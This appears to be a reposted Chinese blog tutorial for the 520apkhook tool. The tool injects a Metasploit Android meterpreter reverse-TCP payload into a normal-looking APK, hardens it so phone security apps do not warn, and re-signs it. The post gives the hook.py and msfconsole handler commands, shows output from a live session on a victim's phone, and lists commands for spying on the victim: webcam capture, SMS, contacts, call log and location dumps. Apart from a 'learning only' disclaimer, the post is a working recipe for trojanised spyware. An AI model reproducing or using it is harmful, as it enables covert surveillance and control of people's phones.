介紹
由于經典的MSF生成apk安裝包控制,版本較低,高版本安卓手機可能會出現版本不支持或無法使用的現象,而且apk無法正常使用,沒有圖形化界面,比較假。
-
相比于原始的msf遠控,此版本app在進行遠控時,被注入的app可以正常運行,原始msf生成的app程序,只在桌面上有一個圖標,點擊后沒有任何app界面。
-
注入后的app在安裝時,手機管家不會有任何安全提示,原始msf生成的app程序,安裝時手機管家會有安全警示。
項目地址
-
將msf生成的payload,注入到一個正常的apk文件中,重新打包后進行加固,bypass手機安全管家的檢測。
-
項目地址:?GitHub - ba0gu0/520apkhook: 把msf生成的安卓遠控附加進普通的app中,并進行加固隱藏特征??梢岳@過常見的手機安全管家。
-
作者: BaoGuo
重點說明
-
項目目前由于加固腳本問題, 目前只支持單classes.dex文件操作.
-
本項目僅用于安全研究, 禁止利用腳本進行攻擊, 使用本腳本產生的一切問題和本人無關.
-
部分被加固過的app無法進行注入,已測試網易系列,360系列,騰訊系列,其他的請自行測試。
項目依賴
-
本項目參考以下項目
-
Java層DEX一鍵加固腳本
-
APK Infector
使用
- 使用Linux或者macos主機, 安裝python3, openjdk8, metasploit-framework.
- 使用python3生成apk文件, 需要指定msf遠控鏈接的IP和端口.
cd 520apkhook
python3 hook.py --lhost 192.168.?.? --lport 1433 -n ./base.apk
// --host 指定msf遠控的IP
// --lport 指定msf遠控端口
// -n 指定被注入的apk文件路徑
生成需要指定的msf payload類型
python3 hook.py --lhost 192.168.?.? --lport 1433 -n ./base.apk
[*] 創(chuàng)建隨機字符串,用來修改msf payload!
[+] 生成成功!
[*] 檢查電腦上的開發(fā)環(huán)境
================================
[:] NOTE : 請確認安裝jdk8環(huán)境!
[*] 檢查 : Jdk版本
javac 1.8.0_282
[+] JDK - OK
[*] 檢查 : msfvenom
[+] msfvenom - OK
====================================
[*] Available Types of Payload
====================================
(1) android/meterpreter/reverse_tcp
(2) android/meterpreter/reverse_http
(3) android/meterpreter/reverse_https
[?] 選擇msf payload (1/2/3): 1
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10192 bytes
......
apk簽名時需要輸入證書的相關信息
......
[*] 將加固后的dex文件替換apk中的class dex!
'classes.dex'...
[+] 插入成功 !
[+] app加固完成
[*] 創(chuàng)建app簽名文件!
您的名字與姓氏是什么?
[Unknown]: 123456
您的組織單位名稱是什么?
[Unknown]: 123456
您的組織名稱是什么?
[Unknown]: 123456
您所在的城市或區(qū)域名稱是什么?
[Unknown]: 123456
您所在的省/市/自治區(qū)名稱是什么?
[Unknown]: 123456
該單位的雙字母國家/地區(qū)代碼是什么?
[Unknown]: 123456
CN=123456, OU=123456, O=123456, L=123456, ST=123456, C=123456是否正確?
[否]: y
......
在生成apk文件后, 目錄下會產生Final_Infected.apk
和handler.rc
ls
Final_Infected.apk base.apk hook.py libs
Readme.md handler.rc images
使用msfconsole加載handler.rc進行服務端監(jiān)聽
msfconsole -r handler.rc
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.0.42-dev-b177452c898ad956be8540a40c805bf52310c234]
+ -- --=[ 2124 exploits - 1137 auxiliary - 361 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services
[*] Processing handler.rc for ERB directives.
resource (handler.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (handler.rc)> set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
resource (handler.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (handler.rc)> set LPORT 1433
LPORT => 1433
resource (handler.rc)> set exitonsession false
exitonsession => false
resource (handler.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:1433
msf6 exploit(multi/handler) >
......
將生成的apk文件在安卓手機進行安裝, 即可完成對目標的控制
成功后,可以在msf中進行遠程控制
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter dalvik/android u0_a53 @ localhost 192.168.0.21:1433 -> 192.168.0.68:65133 (192.168.16
4.194)
msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : localhost
OS : Android 11 - Linux 5.4.61-********+ (armv81)
Meterpreter : dalvik/android
meterpreter > ls
No entries exist in /data/user/0/com.zhangy.vphone/files
meterpreter > app_list
Application List
================
Name Package Running IsSystem
---- ------- ------- --------
Android System WebView com.android.webview false true
Android 系統(tǒng) android false true
Android動態(tài)壁紙 com.android.wallpaper false true
Arm Pro armadillo.studio false false
Black Hole com.android.galaxy4 false true
Bluetooth MIDI Service com.android.bluetoothmidiservice false true
Call Log Backup/Restore com.android.calllogbackup false true
CaptivePortalLogin com.android.captiveportallogin false true
HTML 查看程序 com.android.htmlviewer false true
Intent Filter Verification Service com.android.statementservice false true
KK谷歌助手 io.kkzs false true
LOL GG com.hpdjyxsziq.sqmezcbpyf false false
Live Wallpaper Picker com.android.wallpaper.livepicker false true
MT管理器 bin.mt.plus false false
......
一些MSF的常見利用命令
seessions 查看已經獲取的會話
sysinfo 查看目標系統(tǒng)信息
screenshot 屏幕截圖
webcam_list 查看相機列表
webcam_stream 開啟攝像頭
webcam_snap 拍照
dump_calllog 獲取電話
dump_contacts?獲取通訊錄
dump_sms?獲取短信
geolocate 獲取位置
注意:僅供學習測試,不得用于非法或者商業(yè)目的,否則后果自負,所有權及解釋權歸本人所有。文章來源地址http://www.zghlxwxcb.cn/news/detail-794613.html
注意:僅供學習測試,不得用于非法或者商業(yè)目的,否則后果自負,所有權及解釋權歸本人所有。文章來源:http://www.zghlxwxcb.cn/news/detail-794613.html
注意:僅供學習測試,不得用于非法或者商業(yè)目的,否則后果自負,所有權及解釋權歸本人所有。
到了這里,關于利用MSF打包加固APK對安卓手機進行控制的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!